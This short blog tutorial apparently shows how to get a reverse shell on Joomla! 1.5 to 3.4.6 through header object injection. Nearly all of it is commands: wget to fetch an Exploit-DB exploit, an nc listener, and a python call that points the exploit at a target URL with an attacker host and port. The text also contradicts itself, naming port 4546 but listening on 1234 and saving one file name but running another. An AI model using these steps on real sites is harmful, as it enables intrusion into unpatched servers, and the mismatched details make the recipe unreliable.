How to upload a shell in Joomla! 1.5 < 3.4.6

Joomla! 1.5 < 3.4.6 Remote Code Execution

Joomla! cms between version 1.5 until 3.4.6 allows Object Injection in ‘x-forwarded-for’  Header which leads to a Remote Code Execution.

you can download the exploit from Exploit-DB using:

  • wget https://www.exploit-db.com/download/39033 -O exploit.py

and then we need to set up a TCP listen on port 4546:

  • nc -nlvp 1234

now everything should be ready and we just need to specify the port and the LHOST and then run the exploit to spawn a reverse shell:

  • python joomla-rce-2-shell.py -t http://10.10.10.116/ -l 10.10.14.7 -p 1234

Happy Hacking!

Comments are closed, but trackbacks and pingbacks are open.

SignupSubscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.

Subscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.